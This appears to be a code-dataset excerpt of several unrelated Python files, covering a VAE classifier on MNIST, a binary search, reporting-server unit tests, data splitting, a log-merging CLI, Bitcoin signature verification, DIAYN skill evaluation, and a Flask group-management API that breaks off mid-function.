Dataset schema:
  max_stars_repo_path   string  (length 3 to 269)
  max_stars_repo_name   string  (length 4 to 119)
  max_stars_count       int64   (0 to 191k)
  id                    string  (length 1 to 7)
  content               string  (length 6 to 1.05M)
  score                 float64 (0.23 to 5.13)
  int_score             int64   (0 to 5)
MNIST/CNNClassifiaction.py
AliLotfi92/InfoMax_VAE
8
12789851
import torch
from torch.autograd import Variable
import torch.nn as nn
from torchvision import datasets, transforms
from torch.utils.data import DataLoader
import torch.optim as optim
import math
import numpy as np
import os
import torch.nn.functional as F
import torch.nn.init as init
import matplotlib.pyplot as plt
import seaborn as sns
import warnings

warnings.filterwarnings('ignore')


class Classification(nn.Module):
    """Small MLP that classifies digits from the 2-D VAE latent space."""

    def __init__(self, z_dim=2):
        super(Classification, self).__init__()
        self.z_dim = z_dim
        self.net = nn.Sequential(
            nn.Linear(z_dim, 10),
            nn.ReLU(True),
            nn.Linear(10, 10),
        )
        self.weight_init()

    def weight_init(self, mode='normal'):
        initializer = normal_init
        for block in self._modules:
            for m in self._modules[block]:
                initializer(m)

    def forward(self, z):
        return self.net(z).squeeze()


class CNNVAE1(nn.Module):
    """Convolutional VAE; encode() outputs mu and logvar stacked along dim 1."""

    def __init__(self, z_dim=2):
        super(CNNVAE1, self).__init__()
        self.z_dim = z_dim
        self.encode = nn.Sequential(
            nn.Conv2d(1, 28, 4, 2, 1),
            nn.ReLU(True),
            nn.Conv2d(28, 28, 4, 2, 1),
            nn.ReLU(True),
            nn.Conv2d(28, 56, 4, 2, 1),
            nn.ReLU(True),
            nn.Conv2d(56, 118, 4, 2, 1),
            nn.ReLU(True),
            nn.Conv2d(118, 2 * z_dim, 1),
        )
        self.decode = nn.Sequential(
            nn.Conv2d(z_dim, 118, 1),
            nn.ReLU(True),
            nn.ConvTranspose2d(118, 118, 4, 2, 1),
            nn.ReLU(True),
            nn.ConvTranspose2d(118, 56, 4, 2, 1),
            nn.ReLU(True),
            nn.ConvTranspose2d(56, 28, 4, 1),
            nn.ReLU(True),
            nn.ConvTranspose2d(28, 28, 4, 2, 1),
            nn.ReLU(True),
            nn.ConvTranspose2d(28, 1, 4, 2, 1),
            nn.Sigmoid(),
        )

    def reparametrize(self, mu, logvar):
        std = logvar.mul(0.5).exp_()
        eps = std.data.new(std.size()).normal_()
        return eps.mul(std).add_(mu)

    def forward(self, x, no_dec=False, no_enc=False):
        if no_enc:
            # decoder-only path; was `torch.randn(49, z_dim)` relying on the global z_dim
            # (note: decode() expects a 4-D input, as in the no_dec path below)
            gen_z = Variable(torch.randn(49, self.z_dim), requires_grad=False)
            gen_z = gen_z.to(device)
            return self.decode(gen_z).view(x.size())

        if no_dec:
            stats = self.encode(x)
            mu = stats[:, :self.z_dim]
            logvar = stats[:, self.z_dim:]
            z = self.reparametrize(mu, logvar)
            return z.squeeze()
        else:
            # was `self.encode(x.view(-1, 784))`, but the encoder is
            # convolutional and expects (N, 1, 28, 28) input
            stats = self.encode(x)
            mu = stats[:, :self.z_dim]
            logvar = stats[:, self.z_dim:]
            z = self.reparametrize(mu, logvar)
            x_recon = self.decode(z).view(x.size())
            return x_recon, mu, logvar, z.squeeze()


def normal_init(m):
    if isinstance(m, (nn.Linear, nn.Conv2d)):
        init.normal_(m.weight, 0, 0.02)  # init.normal is deprecated
        if m.bias is not None:
            m.bias.data.fill_(0)
    elif isinstance(m, (nn.BatchNorm1d, nn.BatchNorm2d)):
        m.weight.data.fill_(1)
        if m.bias is not None:
            m.bias.data.fill_(0)


def recon_loss(x_recon, x):
    n = x.size(0)
    # size_average=False is deprecated; reduction='sum' is the equivalent
    loss = F.binary_cross_entropy(x_recon, x, reduction='sum').div(n)
    return loss


def kl_divergence(mu, logvar):
    kld = -0.5 * (1 + logvar - mu ** 2 - logvar.exp()).sum(1).mean()
    return kld


use_cuda = torch.cuda.is_available()
device = 'cuda' if use_cuda else 'cpu'
print('This code is running over', device)

max_iter = 20
batch_size = 100
z_dim = 2  # was assigned twice in the original
lr_C = 0.001
beta1_C = 0.9
beta2_C = 0.999

training_set = datasets.MNIST('./tmp/MNIST', train=True, download=True, transform=transforms.ToTensor())
test_set = datasets.MNIST('./tmp/MNIST', train=False, download=True, transform=transforms.ToTensor())
data_loader = DataLoader(training_set, batch_size=batch_size, shuffle=True)
test_loader = DataLoader(test_set, batch_size=10000, shuffle=True, num_workers=3)

VAE = CNNVAE1().to(device)
VAE.load_state_dict(torch.load('./Info_VAE_CNN'))

C = Classification().to(device)
optim_C = optim.Adam(C.parameters(), lr=0.005, betas=(beta1_C, beta2_C))
criterion = nn.CrossEntropyLoss()
print('Network is loaded')

Result = []

for epoch in range(max_iter):
    train_loss = 0
    for batch_idx, (x_true, target) in enumerate(data_loader):
        x_true, target = x_true.to(device), target.to(device)
        z = VAE(x_true, no_dec=True)  # encode images into the frozen VAE's latent space
        outputs = C(z)

        loss = criterion(outputs, target)
        optim_C.zero_grad()
        loss.backward()
        optim_C.step()
        train_loss += loss.item()

        if batch_idx % 100 == 0:
            print('Train Epoch: {} [{}/{} ({:.0f}%)] \t Loss: {:.6f}'.format(
                epoch, batch_idx * len(x_true), len(data_loader.dataset),
                100. * batch_idx / len(data_loader), loss.item()))

    print('====> Epoch: {}, \t Average loss: {:.4f}'.format(epoch, train_loss / (batch_idx + 1)))
    Result.append(('====>epoch:', epoch, 'loss:', train_loss / (batch_idx + 1)))

(x_test, labels) = next(iter(test_loader))  # `.next()` is Python 2 syntax
x_test, labels = x_test.to(device), labels.to(device)
z = VAE(x_test, no_dec=True)
outputs = C(z)
_, predicted = torch.max(outputs.data, 1)
Accuracy = (predicted == labels).sum().item() / x_test.size(0)
Result.append(Accuracy)

with open("InfoAccuracyCNN.txt", "w") as output:
    output.write(str(Result))
2.84375
3
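The record above hinges on the reparameterization trick inside CNNVAE1.reparametrize(). A minimal standalone sketch of that trick (shapes are illustrative, nothing beyond torch is assumed):

import torch

mu = torch.zeros(4, 2)        # batch of 4, latent dim 2
logvar = torch.zeros(4, 2)    # log-variance predicted by the encoder
std = (0.5 * logvar).exp()    # sigma = exp(logvar / 2)
eps = torch.randn_like(std)   # only the noise is sampled, so gradients flow to mu/logvar
z = mu + eps * std            # differentiable sample from N(mu, sigma^2)
print(z.shape)                # torch.Size([4, 2])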
binary_search.py
giuliasindoni/Algorithm-runtimes
1
12789852
import math
import time

import matplotlib.pyplot as plt
import numpy

from quick_sort import quick_sort


def binary_search(sortedarray, key):
    left = 0
    right = len(sortedarray) - 1
    while left <= right:
        mid = math.floor((left + right) / 2)
        if key == sortedarray[mid]:
            return mid
        else:
            if key < sortedarray[mid]:
                right = mid - 1
            else:
                left = mid + 1
    return -1


#x = [49, 50, 50, 50, 900]
#mykey = 50
#print(binary_search(x, mykey))
3.6875
4
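Given the repository's focus ("Algorithm-runtimes"), a hypothetical timing harness for the binary_search above; the list sizes and key choice are illustrative:

import random
import time

from binary_search import binary_search

for n in (10_000, 100_000, 1_000_000):
    data = sorted(random.randint(0, n) for _ in range(n))
    key = data[n // 2]
    start = time.perf_counter()
    binary_search(data, key)
    elapsed = time.perf_counter() - start
    print(f"n={n}: {elapsed * 1e6:.1f} us")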
unittests/test_reporting_server.py
stepanandr/taf
10
12789853
# Copyright (c) 2011 - 2017, Intel Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""``test_reporting_server.py``

`Unittests for reporting server functions`

"""

import sys
import os

import pytest

sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../reporting')))

from reporting.reporting_server import XMLReportingServer, imp_plugins

xmlrpcsrv = XMLReportingServer()


@pytest.fixture(scope="function", autouse=True)
def reporting_server():
    opts = {'loglevel': 'DEBUG', 'logprefix': 'main', 'port': '18081',
            'logdir': 'logs', 'multiuser': True}

    class CustomOptsParser(object):

        def __init__(self):
            self.multiuser = True
            self.port = '18081'
            self.logprefix = 'main'
            self.logdir = 'logs'
            self.loglevel = 'DEBUG'

    opts = CustomOptsParser()  # the attribute-style options supersede the dict above
    xmlrpcsrv = XMLReportingServer()
    xmlrpcsrv.setup(opts)
    sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), "../plugins/", './')))
    imp_plugins("reports")
    imp_plugins("connectors")
    return xmlrpcsrv


@pytest.fixture(scope="function", autouse=True)
def reporting_server_with_config(reporting_server):
    reporting_server.xmlrpc_open("test_client-1")
    reporting_server.xmlrpc_reportadd("test_client-1", "xml")
    reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "options", [['update', None]])
    reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "cfgfile", None)
    reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "info_dict", None)
    reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "info_dict", ['chipName', 'SomeSwitch'])
    reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "info_dict",
                                         ['TM buildname', '192.168.127.12-SomeSwitch'])
    reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "htmlfile", "1.html")
    reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "htmlcfg", None)
    return reporting_server


def test_client_config(reporting_server):
    """Verify that a client config can be created and reports can be removed.

    """
    reporting_server.xmlrpc_open("test_client-1")
    # check if status of client is Active
    assert reporting_server.clients.get("test_client-1", "status") == "Active"
    # add xml report
    reporting_server.xmlrpc_reportadd("test_client-1", "xml")
    assert reporting_server.clients.get("test_client-1", "reports") == {"xml": True}
    reporting_server.xmlrpc_reportconfig("test_client-1", "xml", "htmlfile", "1.html")
    # check attr on report object
    assert reporting_server._reports['XML']['test_client-1'].htmlfile == "1.html"
    reporting_server.xmlrpc_shutdown()


def test_post(reporting_server_with_config):
    """Verify that the post command succeeds.

    """
    post_data1 = ["test_client-1", "SomeSwitch", "test.test_suite", "test_tcname", "Run",
                  ['Simple brief of test case', '-# First step\n-# Second step'],
                  {'platform': 'SomeSwitch', 'build': '192.168.127.12-SomeSwitch'}, "None"]
    # Check if post successful
    assert reporting_server_with_config.xmlrpc_post(*post_data1), "xmlrpc_post operation is False"


# Check if queuelen works
def test_queue(reporting_server_with_config):
    """Verify that queue operations work.

    """
    expected_queuelist = [{'status': 'Run',
                           'info': {'platform': 'SomeSwitch', 'build': '1.2.3.4-SomeSwitch'},
                           'client': 'test_client-1', 'build': 'SomeSwitch',
                           'report': ['Simple brief of test case', '-# First step\n-# Second step'],
                           'suite': 'test.test_suite', 'tc': 'test_tcname', 'build_info': 'None'}]
    post_data1 = ["test_client-1", "SomeSwitch", "test.test_suite", "test_tcname", "Run",
                  ['Simple brief of test case', '-# First step\n-# Second step'],
                  {'platform': 'SomeSwitch', 'build': '1.2.3.4-SomeSwitch'}, "None"]
    # Check if queue is empty
    assert reporting_server_with_config.xmlrpc_queuelist() == [], "Queuelen is not empty"
    # Send post request
    reporting_server_with_config.xmlrpc_post(*post_data1)
    # Get queue list
    assert reporting_server_with_config.xmlrpc_queuelist() == expected_queuelist
    # Check if queuelen is 1
    assert reporting_server_with_config.xmlrpc_queuelen() == 1, "Queuelen is not right"
    # Call queuedropcmd and check queuelen
    assert reporting_server_with_config.xmlrpc_queuedropcmd(0) == expected_queuelist[0]
    assert reporting_server_with_config.xmlrpc_queuelen() == 0


def test_cmdproc(reporting_server_with_config):
    """Verify that cmdproc operations work.

    """
    reporting_server_with_config.xmlrpc_cmdprocdisable()
    assert reporting_server_with_config.xmlrpc_cmdproccheck() == "Watchdog is False and cmdproc is True", \
        "Watchdog is False. cmdprocdisable doesn't work."
    reporting_server_with_config.xmlrpc_cmdprocenable()
    assert reporting_server_with_config.xmlrpc_cmdproccheck() == "Watchdog is True and cmdproc is True", \
        "Watchdog is True. cmdprocdisable doesn't work."
1.921875
2
python/en/archive/dropbox/miscellaneous_python_files/data4models_old_old.py
aimldl/coding
0
12789854
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
data4models.py

# Sentiment Identification for Roman Urdu
'''

import numpy as np
import pandas as pd


class Data:
    # Constructor
    def __init__(self, config):
        self.config = config

    def split(self, df):
        '''
        Split the (entire) data into training data & test data
        '''
        assert isinstance(df, pd.DataFrame), 'df must be a pandas.DataFrame.'

        test_split_ratio = self.config.test_split_ratio
        print(f'Data.preprocess.split: test_split_ratio={test_split_ratio}')

        reviews = df['review']
        sentiments = df['sentiment']

        n_dataset = df.shape[0]
        n_test = int(n_dataset * test_split_ratio)
        n_training = n_dataset - n_test

        # Use indexing to split the data.
        index_data = np.arange(n_dataset)
        index_training = np.random.choice(index_data, n_training, replace=False)
        index_test = np.delete(index_data, index_training)

        data_training_np = reviews.loc[index_training].values
        data_test_np = reviews.loc[index_test].values
        labels_training_np = sentiments.loc[index_training].values
        labels_test_np = sentiments.loc[index_test].values

        # the original passed these values as extra print() arguments
        # alongside placeholder-free f-strings; folded into real f-strings
        print(f'  number of dataset = {n_dataset}')
        print(f'  np.shape(x_train) = {np.shape(data_training_np)}')
        print(f'  np.shape(y_train) = {np.shape(labels_training_np)}')
        print(f'  np.shape(x_test)  = {np.shape(data_test_np)}')
        print(f'  np.shape(y_test)  = {np.shape(labels_test_np)}')

        # x_train, y_train, x_test, y_test
        return data_training_np, labels_training_np, data_test_np, labels_test_np

#    def __init__(self, x, y, config):
#        self.config = config
#        self.x = x  # shape = (length, dimension)
#        self.y = y  # shape = (length,)

    # NOTE: the original defined a second method also named split(), which
    # silently shadowed the one above; renamed here to keep both callable.
    def split_train_eval_test(self, split_rate=[0.7, 0.2, 0.1]):
        '''
        The default ratio to split the training, evaluation, & test data is 7:2:1.
        '''
        print('split_rate = ', split_rate)
        length, dimension = np.shape(self.x)

        # Split the (entire) data into training, evaluation & test data
        n_training = int(length * split_rate[0])    # 0.7
        n_evaluation = int(length * split_rate[1])  # 0.2
        n_test = length - n_training - n_evaluation

        # Use indexing to split the data.
        index_data = np.arange(length)  # 13704, [0, length-1]
        index_training = np.random.choice(index_data, n_training, replace=False)  # 9592
        index_temp = np.delete(index_data, index_training)  # 4112
        index_evaluation = np.random.choice(index_temp, n_evaluation, replace=False)  # 2740
        # np.delete() removes by *position* while index_evaluation holds *values*,
        # which is why the original comment flagged the wrong size
        # ("# 3547, This must be 1372!"); np.setdiff1d() removes by value.
        index_test = np.setdiff1d(index_temp, index_evaluation)

        data_training = self.x[index_training, :]
        data_evaluation = self.x[index_evaluation, :]
        data_test = self.x[index_test, :]
        labels_training = self.y[index_training]
        labels_evaluation = self.y[index_evaluation]
        labels_test = self.y[index_test]

        training = [data_training, labels_training]
        evaluation = [data_evaluation, labels_evaluation]
        test = [data_test, labels_test]
        return training, evaluation, test

    # =====================================================================
    # The above variables don't have the leading self. to improve readability.
    #   self.length = length          # = size, or n_data
    #   self.dimension = dimension
    #   self.n_training = n_training
    #   self.n_test = n_test

    def load(self, batch_size):
        data_length = len(self.data_training)
        if data_length >= batch_size:
            # Because of replace=False,
            # ValueError: Cannot take a larger sample than population when 'replace=False'
            index = np.random.choice(data_length, batch_size, replace=False)
            data = self.data_training[index, :]
            labels = self.labels_training[index]
            self.data_training = np.delete(self.data_training, index, axis=0)
            self.labels_training = np.delete(self.labels_training, index)
            done = True
        else:  # data_length < batch_size
            # reset the pool; the original left `data`/`labels` unbound here,
            # which would raise NameError at the return below
            data, labels = None, None
            self.data_training = self.x[self.index_training]
            self.labels_training = self.y[self.index_training]
            done = False
        return data, labels, done

# EOF
3.234375
3
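A hypothetical use of Data.split() from the record above; the config object and the 'review'/'sentiment' column names follow the assumptions the class itself makes, and the tiny DataFrame is purely illustrative:

from types import SimpleNamespace

import pandas as pd

config = SimpleNamespace(test_split_ratio=0.3)
df = pd.DataFrame({
    'review': ['acha hai', 'bura hai', 'zabardast', 'bekaar'],
    'sentiment': [1, 0, 1, 0],
})
x_train, y_train, x_test, y_test = Data(config).split(df)
print(x_train.shape, x_test.shape)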
rfcommands/cli/merge.py
ribosomeprofiling/RFCommands
1
12789855
# -*- coding: utf-8 -*-

from .main import *
from ..merge.bowtie2_logs import merge_bowtie2_logs
from ..merge.overall_stats import merge_overall_stats


@cli.group()
def merge():
    """
    Merges logs and csv files.
    """
    pass


@merge.command()
@click.argument("input_log_paths", nargs=-1, type=click.Path(exists=True))
@click.option('--out', '-o', type=click.Path(exists=False))
def bowtie2_logs(input_log_paths, out):
    """
    Merge alignment statistics coming from Bowtie2 or Hisat2.

    This is done by summing up the corresponding counts
    and calculating the percentages.

    This version is implemented for single-end reads only, so it won't
    work for paired-end statistics yet, though it would not be hard to
    extend this script to the paired-end case.
    """
    print("Merging bowtie2 logs.")

    if len(input_log_paths) == 0:
        exit("There has to be at least one log file as input.")

    return merge_bowtie2_logs(input_logs=input_log_paths, output=out)


@merge.command()
@click.argument("input_stats", nargs=-1, type=click.Path(exists=True))
@click.option('--out', '-o', type=click.Path(exists=False))
def overall_stats(input_stats, out):
    """
    Combine individual stats coming from separate files into one.

    This script takes the overall alignment stats files (in csv format)
    where each file is coming from one sample only. It merges these files
    into one big table where each column corresponds to one experiment.
    """
    if len(input_stats) < 1:
        exit("At least one input file is needed.")

    merge_overall_stats(stat_files=input_stats, out=out)


################################################################################

def _concat_csv(csv_file_list, output_file):
    """
    Helper function for concat_csv
    """
    import pandas as pd

    input_dfs = list(map(lambda x: pd.read_csv(x, header=[0], index_col=[0]),
                         csv_file_list))
    result_df = pd.concat(input_dfs, axis=0, sort=False)
    result_df.to_csv(output_file)
    return result_df


@merge.command()
@click.argument("input_csvs", nargs=-1, type=click.Path(exists=True))
@click.option('--out', '-o', type=click.Path(exists=False))
def concat_csv(input_csvs, out):
    """
    Concatenates the given csv files.

    Concatenates the given csvs in the given order and writes the output
    in csv format. The concatenation is done using pandas, so the column
    names must be compatible across the given csv files.
    """
    if len(input_csvs) < 1:
        exit("At least one input file is needed.")

    _concat_csv(input_csvs, out)

################################################################################
2.46875
2
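A hedged sketch of exercising the concat-csv command above with click's CliRunner; it assumes `cli` is the root group exposed by rfcommands.cli.main and that click derives the command name "concat-csv" from the function name, as recent click versions do by default:

from click.testing import CliRunner

from rfcommands.cli.main import cli

runner = CliRunner()
result = runner.invoke(cli, ["merge", "concat-csv", "a.csv", "b.csv", "--out", "combined.csv"])
print(result.exit_code, result.output)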
blockchains-cryptos/BTC_P2PKH_sigvef_eg.py
black-wolfie/blockchain-with-python-3
2
12789856
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 4 22:46:11 2018
"""
import BTC_P2PKH_sigvef as bv

# verifying two P2PKH Bitcoin signed messages
address = 'bitcoin:16vqGo3KRKE9kTsTZxKoJKLzwZGTodK3ce'
signature = ('HPDs1TesA48a9up4QORIuub67VHBM37X66skAYz0Esg23gdfMu' +
             'CTYDFORc6XGpKZ2/flJ2h/DUF569FJxGoVZ50=')
message = 'test message'
bv.sig_vef_P2PKH(address, signature, message)

address2 = "<KEY>"
message2 = "test message"
signature2 = ("IPn9bbEdNUp6+bneZqE2YJbq9Hv5aNILq9E" +
              "5eZoMSF3/fBX4zjeIN6fpXfGSGPrZyKfHQ/c/kTSP+NIwmyTzMfk=")
bv.sig_vef_P2PKH(address2, signature2, message2)
2.640625
3
diayn/post_epoch_funcs/df_env_eval.py
fgitmichael/SelfSupevisedSkillDiscovery
0
12789857
import numpy as np
import matplotlib.pyplot as plt
import torch
import torch.nn.functional as F

from diayn_cont.post_epoch_funcs.df_env_eval import DfEnvEvaluationDIAYNCont

import rlkit.torch.pytorch_util as ptu
from rlkit.samplers.data_collector.path_collector import MdpPathCollector

import self_supervised.utils.my_pytorch_util as my_ptu
from seqwise_cont_skillspace.utils.get_colors import get_colors


class DfEnvEvaluationDIAYN(DfEnvEvaluationDIAYNCont):

    def __init__(self,
                 *args,
                 skill_dim,
                 **kwargs,
                 ):
        super().__init__(*args, **kwargs)
        self.skill_dim = skill_dim

    def collect_skill_influence_paths(self) -> dict:
        assert isinstance(self.seq_collector, MdpPathCollector)

        skill_array = [number for number in range(self.seq_collector._policy.skill_dim)]
        skill_ids = []
        skills = []
        for skill_id, skill in enumerate(skill_array):
            self.seq_collector._policy.skill = skill
            self.seq_collector.collect_new_paths(
                max_path_length=self.seq_len,
                num_steps=self.seq_len,
                discard_incomplete_paths=False,
            )
            skills.append(skill)
            skill_ids.append(skill_id)
        skill_influence_paths = self.seq_collector.get_epoch_paths()
        skill_influence_paths = list(skill_influence_paths)
        assert isinstance(skill_influence_paths, list)

        for skill_id, skill, path in zip(skill_ids, skills, skill_influence_paths):
            path['skill_id'] = skill_id
            path['skill'] = skill
        self._check_skill_influence_paths(skill_influence_paths)

        skill_influence_paths = self._stack_paths(skill_influence_paths)
        return skill_influence_paths

    @torch.no_grad()
    def apply_df(self, *args, next_observations, **kwargs) -> dict:
        next_observations = ptu.from_numpy(next_observations)
        skill_recon = my_ptu.eval(self.df_to_evaluate, next_observations)
        ret_dict = dict(skill_recon=skill_recon)
        return ret_dict

    def plot_posterior(self, *args, epoch, skill_recon, skill_id, skill, **kwargs):
        pass

    def classifier_evaluation(self, *args, epoch, skill_recon, skill, **kwargs):
        # skills_np = np.array([np.array([_skill] * self.seq_len) for _skill in skill])
        assert isinstance(skill, list)
        assert skill_recon.shape[:-1] == torch.Size((len(skill), self.seq_len))

        skill_recon_reshaped = skill_recon.reshape(len(skill) * self.seq_len, -1)
        assert my_ptu.tensor_equality(skill_recon_reshaped[:self.seq_len], skill_recon[0, ])

        skills = torch.stack([torch.tensor(skill)] * self.seq_len, dim=-1) \
            .reshape(len(skill) * self.seq_len)
        df_accuracy_eval = F.cross_entropy(skill_recon_reshaped.cpu(), skills.cpu())

        self.diagno_writer.writer.writer.add_scalar(
            tag=self.get_log_string("Classifier Performance/Eval"),
            scalar_value=df_accuracy_eval,
            global_step=epoch,
        )
1.992188
2
app/blueprints/api/v1/ag/__init__.py
Info-ag/labplaner
7
12789858
'''
basic blueprint routes for interacting with an AG
'''
# import third party modules
import re

from flask import Blueprint, request, jsonify, g, url_for, flash, redirect
from sqlalchemy.sql import exists, and_
from werkzeug.exceptions import BadRequest, PreconditionFailed

# import database instance
from app.models import db
# import app with config etc.
from app import app
# import database models
from app.models.ag import AG, AGSchema, AGSchemaIntern
from app.models.associations import UserAG
# import utilities
from app.util import requires_auth
from app.util.assocations import requires_mentor, requires_member_association
from app.util.ag import requires_ag
from app.util.user import get_user_by_username
# import additional blueprints regarding applications, invitations and messages of ags
from app.blueprints.api.v1.ag import applications, invitations, messages
# import regex config for creating an ag
from config.regex import AGRegex

# declare the blueprint variable for this blueprint
bp = Blueprint('ag_api', __name__)

# register the additional blueprints
app.register_blueprint(invitations.bp, url_prefix='/invitations')
app.register_blueprint(applications.bp, url_prefix='/applications')
app.register_blueprint(messages.bp, url_prefix='/messages')

# declare the needed marshmallow schemas
ag_schema_intern = AGSchemaIntern()
ag_schema = AGSchema()
ags_schema = AGSchema(many=True)


@bp.route('/', methods=['POST'])
# check that the requester is authenticated/logged in
@requires_auth()
def add_ag():
    '''
    Create a new AG. The request body has to include the following:
    :key: name: AG name used to identify the ag (eg. /ag/<name>)
    :key: display_name: AG name that is human readable (can contain spaces etc.)
    :key: description: A description of the AG

    :return: If everything went as it should, the newly created AG is returned.
    '''
    # read request values
    name = request.values.get('name')
    display_name = request.values.get('display_name')
    description = request.values.get('description')

    # check that the ag name and display name have not been used before and
    # that the values match the regex patterns;
    # if something isn't right, return an error message
    if db.session.query(exists().where(AG.name == name)).scalar() or not bool(
            re.match(AGRegex.name, name)):
        return jsonify({'reason': 'name'}), 400
    if db.session.query(exists().where(AG.display_name == display_name)).scalar() or not bool(
            re.match(AGRegex.display_name, display_name)):
        return jsonify({'reason': 'display_name'}), 400
    if not bool(re.match(AGRegex.description, description)):
        return jsonify({'reason': 'description'}), 400

    # create a new database AG entry
    ag: AG = AG()
    ag.name = name
    ag.display_name = display_name
    ag.description = description
    ag.color = request.values.get('color', default='primary')

    # Add the AG entry to the DB to create a new id
    db.session.add(ag)
    db.session.flush()

    # Create the association entry to the creating user, so he is added as mentor
    user_ag = UserAG()
    user_ag.user_id = g.session.user_id
    user_ag.ag_id = ag.id
    user_ag.status = 'ACTIVE'
    user_ag.role = 'MENTOR'

    # add the association entry and save the database changes
    db.session.add(user_ag)
    db.session.commit()

    # return a success message
    return jsonify({'status': 'success', 'redirect': url_for('ag.invite_ag', ag_name=ag.name)}), 200


@bp.route('/id/<ag_id>', methods=['GET'])
# check that the requester is authenticated/logged in
@requires_auth()
# check that the ag with the ag_id exists and add it to the params/kwargs
@requires_ag()
def get_ag_by_id(ag_id, ag):
    '''
    Query an AG specified by its id
    :param ag_id: A specific id
    :return: JSON representation of the AG
    '''
    # if the requester is a member of the ag --> return the schema for a member
    # else --> return the schema for a non-member
    # note: the original combined the two filters with Python's `and`, which
    # SQLAlchemy cannot translate into SQL; and_() is required
    if db.session.query(exists().where(and_(UserAG.user_id == g.session.user_id,
                                            UserAG.ag_id == ag_id))).scalar():
        return ag_schema_intern.jsonify(ag), 200
    else:
        return ag_schema.jsonify(ag), 200


@bp.route('/name/<ag_name>', methods=['GET'])
# check that the requester is authenticated/logged in
@requires_auth()
# check that the ag with the ag_name exists and add it to the params/kwargs
@requires_ag()
def get_ag_by_name(ag_name, ag):
    '''
    Query an AG specified by its unique name
    :param name: A specific AG name
    :return: JSON representation of the AG
    '''
    # if the requester is a member of the ag --> return the schema for a member
    # else --> return the schema for a non-member
    if db.session.query(exists().where(and_(UserAG.user_id == g.session.user_id,
                                            UserAG.ag_id == ag.id))).scalar():
        return ag_schema_intern.jsonify(ag), 200
    else:
        return ag_schema.jsonify(ag), 200


@bp.route('/<ag_id>', methods=['PUT'])
# check that the requester is authenticated/logged in
@requires_auth()
# check that the requester is a mentor of the ag;
# add the user_ag association and the ag to the params/kwargs
@requires_mentor()
def change_ag_values(ag_id, ag, user_ag):
    '''
    Change values of an AG. The request body may include the following:
    :key: display_name: String with new display_name
    :key: description: String with new description

    :param ag_id: AG id for which ag the provided values should be changed
    :return:
    '''
    # read the request values
    display_name = request.values.get('display_name', default=None)
    description = request.values.get('description', default=None)
    value_changed = False

    # check whether a display_name or description was transmitted;
    # if so, update the ag entry
    if display_name is not None and bool(re.match(AGRegex.display_name, display_name)):
        ag.display_name = display_name
        value_changed = True
    if description is not None and bool(re.match(AGRegex.description, description)):
        ag.description = description
        value_changed = True

    # if some value got changed, merge the entry into the database and return a success message
    if value_changed:
        db.session.merge(ag)
        db.session.commit()
        return jsonify({'status': 'success'}), 200
    # else return a BadRequest message
    else:
        return BadRequest()


@bp.route('/', methods=['GET'])
# check that the requester is authenticated/logged in
@requires_auth()
def get_all_ags():
    '''
    Query up to 20 ags. The request body may include the following:
    :key: count: Int with the count of how many ags to return
                 --> if greater than 20, it will be set to 20
        :default: 5
    :key: offset: Int how many entries to skip
        :default: 0

    :return: JSON Representation of the AGs
    '''
    # read request params and set defaults if not set
    count = request.args.get('count', default=5, type=int)
    offset = request.args.get('offset', default=0, type=int)

    # adjust to a max of 20
    if count > 20:
        count = 20

    # query all ags (with limit and offset)
    all_ags = AG.query.offset(offset).limit(count).all()

    # return a json representation
    return ags_schema.jsonify(all_ags)


@bp.route('<ag_name>/submit_setting', methods=['GET'])
# check that the requester is authenticated/logged in
@requires_auth()
# check that the requester is a mentor of the ag;
# add the user_ag association and the ag to the params/kwargs
@requires_mentor()
def update_users(ag_name, user_ag, ag):
    '''
    Update the roles of users in an ag. The Request body includes the following:
    :key: <user_id>: unique database id of the user
        --> :value: <role> --> 'MENTOR' or 'PARTICIPIANT'

    :param ag_name: ag_name of the ag to be edited

    automatically filled params
    :param user_ag: database entry of the association between the requesting user and the ag
                    --> gets filled by @requires_mentor
    :param ag: database entry of the ag --> gets filled by @requires_mentor

    :return: redirect to the ag dashboard
    '''
    # for every key in request values --> for every user/user_id passed by the form
    for user_id in request.values:
        # the role the user got assigned to be
        role = request.values.get(user_id)
        # query the database entry of the association between the user to be edited and the ag
        edit_user_ag = db.session.query(UserAG).filter(and_(UserAG.user_id == user_id,
                                                            UserAG.ag_id == ag.id)).scalar()
        # if there is a result for this user <==> the user is in the ag
        if edit_user_ag:
            # update his role and stage the changes
            edit_user_ag.role = role
            db.session.flush()
            # if there are no mentors left
            if not ag.mentors:
                # throw an error
                flash(u'An AG needs a minimum of one Mentor', 'error')
                return redirect(url_for('ag.ag_settings', ag_name=ag_name))

    # if there are still mentors
    # --> save changes to the database and redirect to the ag dashboard
    db.session.commit()
    flash(f'Successfully changed the roles in {ag.display_name}', 'success')
    return redirect(url_for('ag.ag_dashboard', ag_name=ag_name))


@bp.route('<ag_name>/leave')
# check that the requester is authenticated/logged in
@requires_auth()
# check if the requester has an association to the ag;
# add the association and the ag to the params/kwargs
@requires_member_association()
def leave_ag(ag_name, ag, user_ag):
    '''
    leave the specified ag

    :param ag_name: name of the ag to leave

    automatically filled params
    :param user_ag: database entry of the association between the requesting user and the ag
                    --> gets filled by @requires_member_association
    :param ag: database entry of the ag --> gets filled by @requires_member_association

    :return: redirect to the dashboard
    '''
    # if the user is not an actual member of the ag, return an error message
    if user_ag.role == 'NONE':
        flash('You cannot leave an AG you are not in', 'error')
        return redirect(url_for('ag.ag_dashboard', ag_name=ag_name))

    # else: update the entry, so the user is no member anymore and has left the ag
    user_ag.role = 'NONE'
    user_ag.status = 'LEFT'
    # stage the changes
    db.session.flush()

    # if there are no members left in the ag
    if not ag.actual_users:
        # delete the ag
        db.session.delete(ag)
        db.session.flush()
        # save a success message
